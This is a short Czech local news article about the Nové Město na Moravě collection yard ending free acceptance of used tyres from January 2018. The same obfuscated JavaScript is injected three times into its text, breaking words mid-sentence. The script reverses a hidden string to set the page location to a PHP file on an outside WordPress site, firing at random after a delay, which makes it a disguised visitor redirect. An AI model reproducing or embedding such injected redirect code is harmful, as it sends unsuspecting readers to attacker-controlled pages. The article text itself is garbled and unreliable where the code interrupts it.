Rainbow page separator

Vysloužilé pneumatiky od ledna sběrný dvůr bezplatně nepřijme

Úterý, 5. prosince 2017

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Od začátku nového roku už nebude možné zdarma odevzdávat vysloužilé pneumatiky ve sběrném dvoře, informovala o [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom novoměstská radnice.
„Pneumatiky lze bez ohledu na značku a bez vazby na nákup zboží či služeb odevzdávat v au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toservisech a pneuservisech. Převzetí pneumatik probíhá v rámci zpětného odběru a je bezplatné. Ve sběrném dvoře bude možné pneumatiky odevzdat pouze za poplatek,“ informoval pracovník odpadového hospodářství novoměstských TS služeb Aleš Popelka. Změna souvisí s tím, že pneumatiky budou od ledna 2018 ze zákona nově podléhat zpětnému odběru.
„Konec odevzdávání pneumatik ve sběrném dvoře by měl mít i pozitivní dopad na odpadové hospodářství města a následně i na poplatek za komunální odpad,“ doplnil Popelka.